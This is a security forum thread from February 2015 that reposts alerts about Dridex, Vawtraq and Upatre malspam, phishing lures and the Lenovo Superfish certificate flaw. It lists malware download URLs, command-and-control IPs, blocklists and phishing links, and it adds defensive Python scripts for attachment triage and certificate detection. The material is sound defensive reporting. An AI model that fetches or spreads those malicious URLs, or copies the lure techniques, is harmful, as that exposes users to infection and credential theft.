Please print “All” attached forms and sign and initial where I highlighted.
Scan and email back to me or fax to me at 407-937-0511.
Sincerely,
Dan Bigelow
Referrals are important to us. If you know anyone who would benefit from our services, please contact me.
We would appreciate the opportunity to work with them.
2636 West State Rd 434 # 112
Longwood, Fl 32779 ...
This spam does -not- actually come from Express Insurance nor have their systems or data been compromised in any way. Instead this is a simple -forgery- with a malicious Word document attached. There are actually at least two different versions of the document with zero detections [1] [2]... Despite the difference, both seem to download from:
http ://ecv.bookingonline .it/js/bin.exe
The download file is saved as %TEMP%\FfdgF.exe and has a VirusTotal detection rate of 3/57*. Automated analysis tools... indicate that it attempts to phone home to:
83.169.4.178 (Hosteurope, Germany)
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
This probably drops a Dridex DLL, however the Malwr analysis appears to have malfunctioned and I don't have a sample.
Recommended blocklist:
83.169.4.178
202.44.54.5
66.110.179.66 "
1] https://www.virustotal.com/en/file/7c1c37569f1e6a7128c832cb54fb5505b431a2f70101ebd68673a9a2ac73903a/analysis/1424256101/
2] https://www.virustotal.com/en/file/07649dcb0d2f4661f3b9fea0450cd0e103f5a4b186fca02e652f94b59a80be8f/analysis/1424256116/
* https://www.virustotal.com/en/file/1a384a6b4fcb3c0ec4639ec5db6632cb7118809ebe52554db6f005993f582211/analysis/1424257699/
:fear: :mad:
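Two of the tricks in this post (an .exe shipped with a PDF icon so that Explorer, with known extensions hidden, shows what looks like a document, and a CAB file fetched under a .jpg name) share one defence: decide what an attachment is from its first bytes, not from its name or icon. The script below is an added example, not code from this thread or the blogs it quotes. It unpacks a zip attachment, sniffs each member's signature, compares that with what the extension claims, and for Office Open XML members looks inside for the vbaProject.bin part that carries macros. The attachment and every member in it are constructed here with minimal headers, and the verdict policy (block PE, CAB and macro-bearing OOXML outright, send legacy OLE documents for review) is an assumption of the example.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container

# Signatures checked in order; the first match wins.
MAGIC = [
    (b"MZ", "pe"),            # Windows executable, whatever name or icon it carries
    (b"MSCF", "cab"),         # Microsoft cabinet archive
    (b"%PDF", "pdf"),
    (OLE_MAGIC, "ole"),
    (b"PK\x03\x04", "zip"),   # plain zip, but also .docx/.xlsx/.xlsm
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG", "png"),
]

# What the file name claims the content is.
EXPECTED_BY_EXT = {
    "exe": "pe", "scr": "pe", "dll": "pe", "com": "pe", "cab": "cab",
    "pdf": "pdf", "doc": "ole", "xls": "ole", "ppt": "ole",
    "docx": "zip", "docm": "zip", "xlsx": "zip", "xlsm": "zip",
    "jpg": "jpeg", "jpeg": "jpeg", "png": "png",
}


def sniff(data):
    """Classify content by its leading bytes, ignoring the file name."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return "unknown"


def has_vba_project(zip_bytes):
    """An Office Open XML file carries its macros in a vbaProject.bin part."""
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def triage_member(name, data):
    """Compare what the name claims with what the bytes say, then decide."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind = sniff(data)
    expected = EXPECTED_BY_EXT.get(ext)
    mismatch = kind != "unknown" and expected is not None and expected != kind
    has_vba = kind == "zip" and has_vba_project(data)
    if kind in ("pe", "cab") or has_vba:
        verdict = "block"      # executable content, however it is named
    elif kind == "ole" or mismatch:
        verdict = "review"     # legacy OLE needs a real parser (e.g. olevba) to see macros
    else:
        verdict = "allow"
    return {"name": name, "ext": ext, "type": kind, "mismatch": mismatch,
            "has_vba": has_vba, "verdict": verdict}


def triage_zip(zip_bytes):
    """Triage every member of a zip attachment."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        return [triage_member(i.filename, z.read(i.filename)) for i in z.infolist()]


def _zip_of(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in members.items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed attachment: each member is only a header, enough to trigger the
# signature checks; none of it is a real sample from the spam runs.
SAMPLE_ZIP = _zip_of({
    "attachment.exe": b"MZ\x90\x00" + b"\0" * 60,     # .exe whose PDF icon fools a default Explorer view
    "invoice.pdf": b"MZ\x90\x00" + b"\0" * 60,        # PE hiding behind a document extension
    "dxzq.jpg": b"MSCF" + b"\0" * 32,                 # CAB archive fetched under an image name
    "report.pdf": b"%PDF-1.4\n",
    "36890_06_2015.doc": OLE_MAGIC + b"\0" * 24,
    "15E376774.xlsm": _zip_of({"[Content_Types].xml": "<Types/>",
                               "xl/workbook.xml": "<workbook/>",
                               "xl/vbaProject.bin": OLE_MAGIC + b"\0" * 16}),
    "readme.txt": b"plain text\n",
})


if __name__ == "__main__":
    for f in triage_zip(SAMPLE_ZIP):
        print(f"{f['verdict']:6} {f['name']:20} claims={f['ext'] or '-':5} is={f['type']}"
              + ("  name/content mismatch" if f["mismatch"] else "")
              + ("  contains vbaProject.bin" if f["has_vba"] else ""))
```

A gateway that only matches extensions passes dxzq.jpg and 36890_06_2015.doc straight through; the signature check catches the CAB, and the OLE case is exactly the one the thread keeps hitting, which is why it lands in review rather than allow. The verdict table is deliberately small so that it can be audited; a real deployment would extend MAGIC with the remaining archive and script formats the gateway sees.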
AplusWebMaster
2015-02-19, 13:32
FYI...
Fake 'Statement' SPAM – XLS malware
- http://myonlinesecurity.co.uk/maria-wilson-securigroup-statement-excel-xls-malware/
19 Feb 2015 - "'Maria Wilson Securigroup Statement' pretending to come from Maria Wilson <maria.wilson132@ securigroup .co .uk> (the email address that pretends to send changes with each email so you get maria.wilson<random numbers>@securigroup .co .uk) with a malicious xls attachment is another one from the current bot runs... So far today -3- different versions of the malware attachment have been seen...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Maria-Wilson-Statement.png
19 February 2015 : Statement 18 FEB 2015.xls
Current Virus total detections: 0/57* | 0/57** | 0/57*** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/86a12763d3cf208e30082aa4cac2a143d785d74a35f2ca7aa6d1c68c5bde33f1/analysis/1424337205/
** https://www.virustotal.com/en/file/d6174a638343b830676933d46ea031e5a52d271f36dc327c13503f251adf933c/analysis/1424337493/
*** https://www.virustotal.com/en/file/ebeada62160766732aeb70aa7dd5507c595b41bc93b40fb87059747c409e8eb0/analysis/1424337433/
- http://blog.dynamoo.com/2015/02/malware-spam-maria-wilson.html
19 Feb 2015
"... Recommended blocklist:
83.169.4.178
66.110.179.66
202.44.54.5
14.99.146.242
78.140.164.160
220.143.5.92
217.12.203.34 "
___
Fake 'Invoice' SPAM – XLS malware
- http://myonlinesecurity.co.uk/marylou-proforma-invoice-excel-xls-malware/
19 Feb 2015 - "'Marylou Proforma Invoice' pretending to come from Marylou Champagne <marylou@ droitcour .com> with a malicious Excel XLS attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/marylou-Proforma-Invoice.png
The malware payload is exactly the same as today’s Maria Wilson Securigroup Statement – Excel XLS malware* although -named- differently Inv SP14216.xls "
* http://myonlinesecurity.co.uk/maria-wilson-securigroup-statement-excel-xls-malware/
___
Fake 'Remittance Advice' SPAM - XLS malware
- http://myonlinesecurity.co.uk/this-is-your-remittance-advice-cci36306-excel-xls-malware/
19 Feb 2015 - "Following on from -other- Excel XLS macro laden malwares today we are seeing a load of -damaged/misconfigured- emails with a malicious Excel XLS attachment arriving. The subject says 'This is your Remittance Advice #CCI36306' and pretends to come from Violet Garner <Jodi.1d@ ip-35-29-71-77. bgwan .com> The email has -garbled- plain text content with 3 attachments. They are supposed to be a rerun of 'SGBD National Payments Centre – This is your Remittance Advice' – Excel XLS malware* ... the 3rd is the malware attachment, which is named CCI36306.xls and contains exactly the same malware payload as the other malicious XLS files from today 'Marylou Proforma Invoice'** – Excel XLS malware and "Maria Wilson Securigroup Statement'*** – Excel XLS malware... All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/This-is-your-Remittance-Advice-CCI36306.png
... Some mail clients and mail servers ( particularly web based email services) might deliver these emails intact and readable. My mail server is very precise and doesn’t try to fix broken/misconfigured emails and either rejects/quarantines them or delivers them as is and leaves it up to the receiving email client to make heads or tails of them. These all are from the current bot runs... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/sgbd-national-payments-centre-remittance-advice-excel-xls-malware/
** http://myonlinesecurity.co.uk/marylou-proforma-invoice-excel-xls-malware/
*** http://myonlinesecurity.co.uk/maria-wilson-securigroup-statement-excel-xls-malware/
___
Fake 'order shipment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/your-order-is-ready-for-shipment-tnhp3638_572-excel-xls-malware/
19 Feb 2015 - "'Your order is ready for shipment T/N:HP3638_572' pretending to come from Christian Stout, State Department <834b3a@ aluguelubatuba .com> with a malicious Excel XLS attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Christian-Stout.png
19 February 2015 : HP3638_572.xls - Current Virus total detections: 2/57*
... which downloads from 185.48.56.137 /ssdynamooss/sspidarss.cab and creates %temp\fgdgfffgfgf.exe
(-dridex- banking Trojan) which has a virus total detection rate 5/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720/analysis/1424346447/
** https://www.virustotal.com/en/file/93242b25aaf2aea8ecef7327cbfc40cb8f8fda0eecd4618674062f81186ed8b2/analysis/1424347235/
... Behavioural information
TCP connections
82.151.131.129: https://www.virustotal.com/en/ip-address/82.151.131.129/information/
- http://blog.dynamoo.com/2015/02/malware-spam-state-department-order.html
19 Feb 2015
"...Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24 "
* https://www.virustotal.com/en/file/93242b25aaf2aea8ecef7327cbfc40cb8f8fda0eecd4618674062f81186ed8b2/analysis/1424356739/
** https://www.virustotal.com/en/file/e020506da135769e6adb51c29b3e0965193afae344d709fb1a31bc386f43b1f0/analysis/1424358171/
___
Macros? Really?!
- https://isc.sans.edu/diary.html?storyid=19349
2015-02-19 - "... While the past 15 years or so were mostly devoid of any significant macro viruses, macro-based malware is now making a "successful" comeback. Last week, we saw a significant Dridex malware run that was using macros in Excel files (.XLSM), and earlier this week, the crooks behind the banking spyware "Vawtraq" started to spam the usual "Fedex Package" and "Tax Refund" emails, but unlike in other malspam runs, the attachment was no longer a ZIP with an EXE or SCR inside, but rather a file in Microsoft Office .DOC format. File extension based blocking on the email gateway is not going to save your bacon on this one... For Vawtraq, -if- the recipient -opens- the DOC, the content looks garbled, and the only readable portion is in (apparently) user-convincing red font, asking the recipient to enable macros. You can guess what happens next if the user falls for it...: A VBS and Powershell file get extracted from the DOC, and then download and -run- the Vawtraq malware executable. The whole mess has very low detection in anti-virus, yesterday's Vawtraq started with zero hits on VirusTotal, and even today, one day later, it hasn't made it past 7/52 anti-virus engines detecting the threat yet. Thus, odds are you will need to revert to manual analysis to determine if a suspicious Office document is indeed malicious, and to extract any indicators from it that can help to discover users on your network who have been "had"..."
___
Fake 'DVLA' Phish...
- http://myonlinesecurity.co.uk/dvla-you-are-eligible-to-receive-a-tax-disc-refund-phishing/
19 Feb 2015 - "'You are eligible to receive a tax disc refund' pretending to come from DVLA <refund @directdvla .co .uk> is a brand new -phish- attempt to steal your Personal information, driving licence details and your Bank details. I have never previously seen one of these and definitely have never seen any phishing attempt that asks you to scan/photograph your driving licence and upload a copy of that. This one wants your personal details, a copy of your driving licence to be uploaded and bank details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/dvla_tax_refund_email.png
If you follow-the-link (don't) you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/dvla_tax_refund_1.png
After you upload a copy of your driving licence you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the name and date of birth are filled in:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/dvla_tax_refund_2.png
You are then sent on to the genuine DVLA pages..."
___
Apple GSX Access – Phish...
- http://myonlinesecurity.co.uk/apple-gsx-access-privileges-phishing/
19 Feb 2015 - "'Apple GSX Access Privileges' pretending to come from gsx_notifications@ apple .com is one of the latest phish attempts to steal your Apple account. This one only wants your Apple log in details. Many of them are also designed to specifically steal your credit card and bank details, your email, facebook and other social network log in details as well... Some versions of this phish will ask you to fill in the html (webpage) form that comes -attached- to the email.
Dear GSX User,
Your access privileges on the Apple Global Service Exchange (GSX) system were revoked by GSX_Rejections@ group .apple .com on 19-Feb-2015
Reason for Revoking access :
http ://idmsa-gsx-apple .net/WebApp-login.html
Please contact your GSX administrator for more information.
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/GSX-Access-Privileges-1024x588.png
When (IF) you fill in your user name and password you get sent immediately to an identical page to log in again, but this time it is the genuine Apple GSX log in page..."
___
Some Superfish domains and IP addresses and ranges...
- http://blog.dynamoo.com/2015/02/some-superfish-domains-and-ip-addresse.html
19 Feb 2015 - "In the light of the growing Lenovo/Superfish* fuss, I set out to identify those Superfish domains and IPs that I could, for the purposes of -blocking- or monitoring. The domains and IPs that I have been able to identify are here [csv**]. Superfish appear to operate the following domains (and several subdomains thereof):
venn .me
best-deals-products .com
superfish .com
pin2buy .net
pintobuy .net
similarproducts .net
adowynel .com
govenn .com
group-albums .com
jewelryviewer .com
likethatapps .com
likethatdecor .com
likethatpet .com
likethatpets .com
testsdomain .info
superfish .mobi
vennit .net
superfish .us
These following IP addresses and ranges appear to be used exclusively by Superfish (some of their other domains are on shared infrastructure).
66.70.35.240/28
66.70.34.64/26
66.70.34.128/26
66.70.34.251
66.70.35.12
66.70.35.48
All of those IPs are allocated to Datapipe in the US. Superfish itself is based in Israel, which seems to be a popular place to develop adware..."
* http://thenextweb.com/insider/2015/02/19/lenovo-caught-installing-adware-new-computers/
** http://www.dynamoo.com/files/superfish.csv
>> http://www.reuters.com/article/2015/02/19/us-lenovo-cybersecurity-idUSKBN0LN0XI20150219
Feb 19, 2015
:fear::fear: :mad:
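Added example (my own code, not from myonlinesecurity, dynamoo or the ISC diary quoted above): a small Python attachment triage routine that catches the two patterns these reports keep describing, a zip whose member is a .exe/.scr with a PDF-style name (the Upatre lures, e.g. quotes.zip extracting to quotes.exe) and an Office document carrying a VBA project (the Dridex/Vawtraq macro runs in .xls/.doc and .xlsm). Every sample attachment it is run on is constructed inside the script, not taken from a real email; the function names, the extension set and the MAX_ARCHIVE_DEPTH limit are my own choices, and the legacy-OLE check is a heuristic (it looks for the "_VBA_PROJECT" stream name, which an OLE directory stores uncompressed as UTF-16LE) rather than a full OLE parser.

```python
import io
import os
import zipfile

# Extensions Windows runs on double-click. The Upatre lures above ship one of
# these inside a zip, with a PDF-style icon and a name such as invoice_pdf.exe.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"          # legacy .doc/.xls container
# OLE directory entry names are stored as UTF-16LE and are never compressed, so a
# macro-bearing .doc/.xls carries the stream name "_VBA_PROJECT" in the clear.
# Heuristic: enough for triage, not a substitute for a real OLE/VBA parser.
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")
# OOXML macro containers (.docm/.xlsm/.pptm) keep the VBA project in one of these parts.
OOXML_VBA_PARTS = {"word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin"}

MAX_ARCHIVE_DEPTH = 3   # how deep to descend into nested zips (assumed limit)


def triage_attachment(name, data, depth=0):
    """Return a list of human-readable findings for one attachment.

    Answers "is this something a user should never open from an unexpected
    email", not "is this malicious": a clean result is not a clean bill of health.
    """
    findings = []
    ext = os.path.splitext(name.lower())[1]

    if ext in EXECUTABLE_EXTS:
        findings.append(f"{name}: executable extension {ext}")
    if data[:2] == b"MZ":
        # A PE image whatever the name claims; catches .pdf.scr double extensions
        # as well as binaries renamed to something harmless-looking.
        findings.append(f"{name}: PE executable (MZ header)")

    if data.startswith(OLE_MAGIC):
        if VBA_STREAM_MARKER in data:
            findings.append(f"{name}: legacy Office document with a VBA project")
    elif data[:2] == b"PK" and depth < MAX_ARCHIVE_DEPTH:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = zf.namelist()
                if "[Content_Types].xml" in members:
                    # OOXML package (docx/xlsm/...): only the macro part matters here.
                    for part in sorted(OOXML_VBA_PARTS & set(members)):
                        findings.append(f"{name}: OOXML document with {part}")
                else:
                    # Ordinary archive: triage every member the same way.
                    for member in members:
                        if member.endswith("/"):
                            continue
                        inner = zf.read(member)
                        findings.extend(
                            triage_attachment(f"{name}/{member}", inner, depth + 1))
        except zipfile.BadZipFile:
            findings.append(f"{name}: zip signature but the archive does not parse")

    return findings


def build_zip(entries):
    """Construct an in-memory zip from {member_name: bytes} (test fixture only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member, payload in entries.items():
            zf.writestr(member, payload)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed look-alikes of the attachments described in the posts above.
    samples = {
        "quotes.zip": build_zip({"quotes.exe": b"MZ" + b"\x00" * 64}),
        "Package.zip": build_zip({"invoice.pdf.scr": b"MZ" + b"\x00" * 64}),
        "CCI36306.xlsm": build_zip({"[Content_Types].xml": b"<Types/>",
                                    "xl/vbaProject.bin": b"\x01\x02"}),
        "roexport.doc": OLE_MAGIC + b"\x00" * 504 + VBA_STREAM_MARKER + b"\x00" * 32,
        "notes.zip": build_zip({"notes.txt": b"nothing to see"}),
    }
    for sample_name, blob in samples.items():
        print(sample_name, "->", triage_attachment(sample_name, blob) or ["no findings"])
```

Run it at the mail gateway or on a quarantine folder rather than on the user's desktop; the point of the "show known file extensions" advice in the posts is that the user cannot see what this script sees.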
AplusWebMaster
2015-02-20, 16:28
FYI...
Fake 'Bank' SPAM - PDF malware
- http://myonlinesecurity.co.uk/lloyds-bank-pendeford-securities-please-read-action-requiredpi-documents-region-code-east-2-9147056-fake-pdf-malware/
20 Feb 2015 - "'Lloyds Bank – Pendeford Securities – Please Read Action Required/PI Documents/ Region code East 2/ 9147056/' pretending to come from RSTNAME} Woodruff <Arron.Woodruff@ lloydsbanking .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please find attached our document pack for the above customer. Once completed please return via email to the below address.
If you have any queries relating to the above feel free to contact us at MN2Lloydsbanking@ lloydsbanking .com
Lloyds Banking Group plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC95000. Telephone: 0131 225 4555. Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500. Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 08457 21 31 41. Cheltenham & Gloucester plc. Registered Office: Barnett Way, Gloucester GL4 3RL. Registered in England and Wales 0128078. Telephone: 0845 603 1637
Lloyds Bank plc, Bank of Scotland plc are authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and Prudential Regulation Authority.
Cheltenham & Gloucester plc is authorised and regulated by the Financial Conduct Authority.
Halifax is a division of Bank of Scotland plc. Cheltenham & Gloucester Savings is a division of Lloyds Bank plc.
HBOS plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC272200.
This e-mail (including any attachments) is private and confidential and may contain privileged material. If you have received this e-mail in error, please notify the sender and delete it (including any attachments) immediately. You must not copy, distribute, disclose or use any of the information in it or any attachments. Telephone calls may be monitored or recorded...
The malware attached to this email is the same malware as in today’s other Upatre "delivery supply only quotation 16822 in total"* – fake PDF malware. If previous days are anything to go by, we -will- see -numerous- different emails all containing the same upatre malware and all with different file names..."
* http://myonlinesecurity.co.uk/supply-only-quotation-16822-in-total-fake-pdf-malware/
20 Feb 2015 - "'supply only quotation 16822 in total' pretending to come from wendy@ burwoodsupply .co .uk with a zip attachment is another one from the current bot runs... The email looks like:
Hi
Attached are 1 quotes so far they are in excel format so they can be altered if necessary (I normally only send the quotes in PDF so they can’t be altered but Mike asked me not to do this).
The rest to follow tomorrow a.m.
Regards
Teresa Byron
Office Administrator
ECY Armco Barley Castle Lane, Appleton Thorn, Warrington, Cheshire, WA4 4RB t: +44(0)1925 860000 f: +44(0)1925 861111
This email is confidential. It may also be privileged or otherwise protected by work product immunity or other legal rules. If you are not the intended recipient please notify the sender. Please delete the message from all places in your computer where it is stored...
20 February 2015: quotes.zip: Extracts to: quotes.exe
Current Virus total detections: 2/57**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
** https://www.virustotal.com/en/file/d271d5563c8a2ab4dac1eeaef22d1ea510148983231d907e08241d58b1c1a5ea/analysis/1424432388/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
81.169.145.150: https://www.virustotal.com/en/ip-address/81.169.145.150/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
___
Fake 'NYC Parking Fine' SPAM - malware
- http://www.hoax-slayer.com/new-york-parking-fines-malware.shtml
Feb 20, 2015 - "Email purporting to be from the NYC Department of Finance thanks you for paying $7900 in parking fines via your credit card and suggests you open an -attached- file to view details... claims to be from the NYC Department of Finance... Opening the attached .zip file will reveal a malicious .exe file. If you then click-the-.exe file, -malware- may be installed on your computer. The exact type of malware varies..."
___
Lenovo - vulnerable to HTTPS Spoofing
- https://www.us-cert.gov/ncas/current-activity/2015/02/20/Lenovo-Computers-Vulnerable-HTTPS-Spoofing
Feb 20, 2015 - "Lenovo consumer personal computers employing the pre-installed Superfish Visual Discovery software contain a critical vulnerability through a compromised root CA certificate. Exploitation of this vulnerability could allow a remote attacker to read -all- encrypted web browser traffic (HTTPS), successfully impersonate (spoof) any website, or perform other attacks on the affected system. US-CERT recommends users and administrators review Vulnerability Note VU#529496* and US-CERT Alert TA15-051A** for additional information and mitigation details."
* http://www.kb.cert.org/vuls/id/529496
Feb 20, 2015 - "... Solution: The CERT/CC is currently unaware of any official solutions to this problem and recommends the following workarounds.
- Uninstall Komodia Redirector SDK and associated root CA certificates
- Uninstall any software that includes the Komodia Redirector and SSL Digestor libraries..."
** https://www.us-cert.gov/ncas/alerts/TA15-051A
Feb 20, 2015 - "... Solution: Uninstall Superfish VisualDiscovery and associated root CA certificate
- Uninstall any software that includes the Komodia Redirector and SSL Digestor libraries. In the case of Lenovo PCs, this includes Superfish Visual Discovery.
It is also necessary to remove affected root CA certificates. Simply uninstalling the software does not remove the certificate. Microsoft provides guidance on [3] deleting and [4] managing certificates in the Windows certificate store. In the case of Superfish Visual Discovery, the offending trusted root certification authority certificate is issued to “Superfish, Inc.”
Mozilla provides similar [5] guidance for their software, including the Firefox and Thunderbird certificate stores."
3] https://technet.microsoft.com/en-us/library/cc772354.aspx
4] http://windows.microsoft.com/en-us/windows-vista/view-or-manage-your-certificates
5] https://wiki.mozilla.org/CA:UserCertDB#Deleting_a_Root_Certificate
> http://support.lenovo.com/us/en/product_security/superfish_uninstall
- https://blog.malwarebytes.org/privacy-2/2015/02/lenovo-and-the-superfish-fiasco/
Feb 20, 2015 - "... To find out if you are affected, you can visit:
- https://filippo.io/Badfish/ "
:fear: :mad:
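Added example, my own code and not part of the US-CERT alert, the CERT/CC note or Lenovo's removal tool: a dependency-free Python script that walks the DER subject of every certificate in the trusted-root store and flags any whose organisation or common name contains "Superfish, Inc.", the subject the alert names. On Windows it reads the store through ssl.enum_certificates("ROOT"); anywhere else it only has the constructed certificate from build_test_cert to work on, which is a cut-down skeleton (no public key, no signature) that exists purely to exercise the parser. Function names and the SUSPECT_SUBJECT_STRINGS tuple are my own assumptions.

```python
import ssl
import sys

# Subject string the US-CERT alert names for the Superfish root. Extend the tuple
# with anything else you want to hunt for; this is an assumed list for the example.
SUSPECT_SUBJECT_STRINGS = ("Superfish, Inc.",)

# Raw DER encodings of the two Name attributes we care about: O (2.5.4.10), CN (2.5.4.3).
NAME_OIDS = {b"\x55\x04\x0a": "O", b"\x55\x04\x03": "CN"}


def _read_tlv(buf, pos):
    """Decode one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(body):
    """Split the body of a SEQUENCE/SET into its (tag, value) elements."""
    out, pos = [], 0
    while pos < len(body):
        tag, value, pos = _read_tlv(body, pos)
        out.append((tag, value))
    return out


def subject_attributes(der_cert):
    """Return {"O": ..., "CN": ...} from the subject Name of a DER X.509 cert."""
    _, cert_body, _ = _read_tlv(der_cert, 0)          # Certificate ::= SEQUENCE
    fields = _children(_children(cert_body)[0][1])     # tbsCertificate fields
    if fields[0][0] == 0xA0:                            # optional [0] EXPLICIT version
        fields = fields[1:]
    subject = fields[4][1]       # serialNumber, signature, issuer, validity, subject
    attrs = {}
    for _, rdn_set in _children(subject):              # RDNSequence ::= SEQUENCE OF SET
        for _, atv in _children(rdn_set):              # SET OF AttributeTypeAndValue
            (_, oid), (_, value) = _children(atv)[:2]
            if oid in NAME_OIDS:
                attrs[NAME_OIDS[oid]] = value.decode("utf-8", "replace")
    return attrs


def find_suspect_roots(der_certs, needles=SUSPECT_SUBJECT_STRINGS):
    """Return the subject attrs of every cert whose O or CN contains a needle."""
    hits = []
    for der_cert in der_certs:
        attrs = subject_attributes(der_cert)
        haystack = attrs.get("O", "") + " " + attrs.get("CN", "")
        if any(needle in haystack for needle in needles):
            hits.append(attrs)
    return hits


def der(tag, body):
    """Minimal DER encoder, used only to build the constructed test certificate."""
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def build_test_cert(org, cn):
    """Construct a self-issued certificate skeleton (truncated after subject, unsigned)."""
    def rdn(oid, text):
        return der(0x31, der(0x30, der(0x06, oid) + der(0x0C, text.encode())))
    name = der(0x30, rdn(b"\x55\x04\x0a", org) + rdn(b"\x55\x04\x03", cn))
    sha256_rsa = der(0x30, der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b") + der(0x05, b""))
    validity = der(0x30, der(0x17, b"150101000000Z") + der(0x17, b"250101000000Z"))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01")
              + sha256_rsa + name + validity + name)
    return der(0x30, tbs + sha256_rsa + der(0x03, b"\x00"))


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("reads the Windows certificate store; run it on the affected PC")
    # ssl.enum_certificates yields (der_bytes, encoding, trust) triples.
    roots = [c for c, enc, _ in ssl.enum_certificates("ROOT") if enc == "x509_asn"]
    for attrs in find_suspect_roots(roots):
        print("suspect trusted root:", attrs)
```

A hit only confirms the certificate is still trusted; removing it is the separate step the Microsoft and Mozilla links above describe, and Firefox and Thunderbird keep their own stores, so a clean Windows store does not mean a clean browser.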
AplusWebMaster
2015-02-23, 17:39
FYI...
Fake Magazine Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/essex-central-magazine-invoice-fake-pdf-malware/
23 Feb 2015 - "'Essex Central Magazine Invoice' pretending to come from Essex Central Magazine <darren@ notifications .kashflow .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please see attached invoice for the upcoming issue of Essex Central
Magazine.
Regards,
Accounts Dept.
23 February 2015: invoice.zip: Extracts to: invoice_pdf.exe
Current Virus total detections: 4/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8762db3bdb7a7a1d69dd2e4e152340baeb0ec4d654698b52a38ab9d736242b79/analysis/1424701064/
- http://blog.mxlab.eu/2015/02/23/fake-email-from-essex-central-magazine-contains-upatre-trojan/
Feb 23, 2014
> https://www.virustotal.com/en/file/8762db3bdb7a7a1d69dd2e4e152340baeb0ec4d654698b52a38ab9d736242b79/analysis/
___
A Week in Security...
- https://blog.malwarebytes.org/online-security/2015/02/a-week-in-security-feb-15-21/
Feb 23, 2013 - "... fakeouts festooned all over YouTube, claiming to activate Windows 10:
> https://blog.malwarebytes.org/online-security/2015/02/windows-10-activation-programs-pups-and-surveys/
... rogue tweets on Twitter baiting whoever is interested in Evolve:
> https://blog.malwarebytes.org/fraud-scam/2015/02/evolve-gamers-hunted-by-malware/
... a quite rare phishing campaign that targets accounts of Japanese gamers who have profiles under Square Enix:
> https://blog.malwarebytes.org/fraud-scam/2015/02/square-enix-phishers-home-in-on-dragon-quest-x-video-gamers/
... an infection via malicious code injection on the official website of renowned British celebrity chef... the site launches exploits targeting vulnerabilities on Adobe Flash, Silverlight, and Java:
